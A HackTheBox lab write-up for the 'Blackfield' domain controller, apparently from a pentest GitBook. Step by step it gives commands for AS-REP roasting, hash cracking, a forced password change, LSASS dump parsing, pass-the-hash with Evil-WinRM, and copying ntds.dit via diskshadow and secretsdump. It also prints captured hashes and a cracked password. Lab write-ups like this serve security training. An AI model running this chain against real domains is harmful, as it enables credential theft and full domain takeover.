Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page

Was this helpful?

  1. Writeups
  2. HackTheBox
  3. Active Directory

Blackfield

https://app.hackthebox.com/machines/255

Last updated 2 years ago

Was this helpful?

Nmap

nmap 10.10.10.192 -p- -sS -sV         

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-10 21:09:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Add "10.10.10.192 blackfield.local" to /etc/hosts.

Starting out we hit kerberos on port 88 against a large username list. Pulling the known account name of Support@blackfield.local.

With no further user accounts discovered we can check null credentials against SMB with smbmap.

smbmap -u null -p "" -H 10.10.10.192 -P 445 2>&1

We have some non default shares. The profiles$ share is of interest as we have READ ONLY access to the share.

Using the smbclient command below, we can recursively download all files and folders in the share.

smbclient '\\10.10.10.192\profiles$' -N -c 'prompt OFF;recurse ON; mget *' 

None of the directories contain any files it seems. We do however, have folders named after potential users. Utilizing this information we can print the direct list to file.

find . -maxdepth 1 -type d -printf '%f\n' > users.txt

Against kerbrute we can check for which users exists.

python3 kerbrute.py -users '~/blackfield/users.txt' -domain 'blackfield.local' -dc-ip '10.10.10.192' -outputusers '~/known_users.txt'

We now have a confirmed user list:

svc_backup
audit2020
support

Where the user support has "Do not require pre-authentication" enabled in Active Directory. With this, we can potentially pull the kerberos hash with Impacket's GetNPUsers.py.

python2 GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -request -usersfile ~/known_users.txt -format john -outputfile ~/hashes.hash

Reading the output file we see our confirmed hash for the support user.

$krb5asrep$support@BLACKFIELD.LOCAL:e4be5339949e37a4049a10b4a175f5e1$0a4606e9cc22be8bf26959b078d7d94703674c0df20808c3d93b2d09d0bacbaef84cc3b1fefd4384b545ce8d109b503db0e4705e4a94d0b8c681ec8a44cbdda2cadd94ea65c94f4e0ac956743ad3dbc2696cf5ad1fcb4aedc95bc8e5e7686311f7471a3455f59f422a4fa99b2850cdab872f065f680239ddc5007f2f1866d705808262203e50ccca81a32ffa1fbcdab215c29ada83678e4298a8ab92e1bf871ae507963f68453289a702bfa9df8ab2b4b73cc0cf07b95d4fb4c0f765f5b4712ce871eb9bd641e41df7efc7243b5e3cc8e92dcc2778c3b25756ebfbef86741840357839d0926f731a6d64bf335c3f675c237bc650

Which, can be cracked wsith John against the rockyou.txt password list.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.hash

Revealing the users password.

Credentials:

support:#00^BlackKnight

Checking with crackmapexec shows the credentials are valid.

crackmapexec smb '10.10.10.192' -u 'support' -p '#00^BlackKnight'

However, at the point we do not have code execution over SMB. We are not a member of "Remote Management Users" and RDP is not running.

What we can utilize however, is bloodhound to pull domain informaiton externally using Bloodhound.py.

python2 bloodhound.py -u 'support' -p '#00^BlackKnight' -ns '10.10.10.192' -d 'blackfield.local' -gc 'dc01.blackfield.local'

After uploading the results to bloodhound we then further investigate our currently owned user support. Looking at the node information we see we have deriative permissions on the "ForceChangePassword" attribute over the user Audit2020.

We can force a password change externally with rpcclient as shown below.

# setuserinfo2 username level password [password_expired]

rpcclient -U support //10.10.10.192 
setuserinfo2 audit2020 23 'Password123'

After the password change we can confirm the credentials with crackmapexec.

crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'Password123' --shares

From our previous findings we know that a forensic SMB share exists. The user audit2020 has access to the share.

smbclient -U 'audit2020' '\\10.10.10.192\forensic'  -c 'prompt OFF;recurse ON; mget *' 

Looking inside the memory_analysis folder, the most interest standout file would be lsass.dmp. Hopefully we can pull some user hashes or password from this.

lsass.dmp is dump file format. The best dedicated tool for this is likely pypykatz.

Install

# Clone repo
git clone https://github.com/skelsec/pypykatz.git
# Install
pip3 install pypykatz

The following syntax can be used to analysis the lsass.dmp file.

pypykatz lsa minidump '~/blackfield/memory_analysis/lsass.DMP'

As shown above we can see the NT hash for the account svc_backup.

As we know from earlier enumeration, this user is a member of the "Remote Management Users" group. As such, we can use Evil-WinRM to login with the account hash.

evil-winrm -i '10.10.10.192' -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

We know this account is already a member of the "Back Operators" group. Let's double check we have the "SeBackupPrivilege" privilege assigned to us so, we can perform privilege escalation.

This privilege grants us the ability to create backups of files on the system. Knowing this, a high value file would be the ntds.dit file which is a database of hashes for domain objects / users. As the ntds.dit file is in constant use we will be unable to create a backup using normal methods as the system will lock the file.

What we can do instead is create a Distributed Shell File (DSH). This file will contain the appropriate commands for us to run the diskshadow utility against the C: drive and ultimately, the ntds.dit file.

I have previously covered this technique before as linked below.

First created a file called viper.dsh on the attacking machine. Then insert the following contents:

set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

Once completed use the command unix2dos to convert the file to DOS format.

unix2dos viper.dsh

Then on the target system create a directory called 'temp' in c:\temp. After this upload the viper.dsh file.

From here run the following commands:

diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit

From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later.

reg save hklm\system c:\Temp\system

From here we can use the download command to download the ntds.dit and system hive file.

download ntds.dit
download system

Now, over on the attacking system we can use Impacket's secretsdump.py to extract the domain account hashes.

python2 'secretsdump.py' -ntds 'ntds.dit' -system 'system' local 

With the administrators NTLM hash we can log into the Domain Controller with Evil-WinRM.

evil-winrm -i '10.10.10.192' -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'

GitHub:

Github:

🚩
https://github.com/fox-it/BloodHound.py
https://github.com/skelsec/pypykatz
Fusion Corp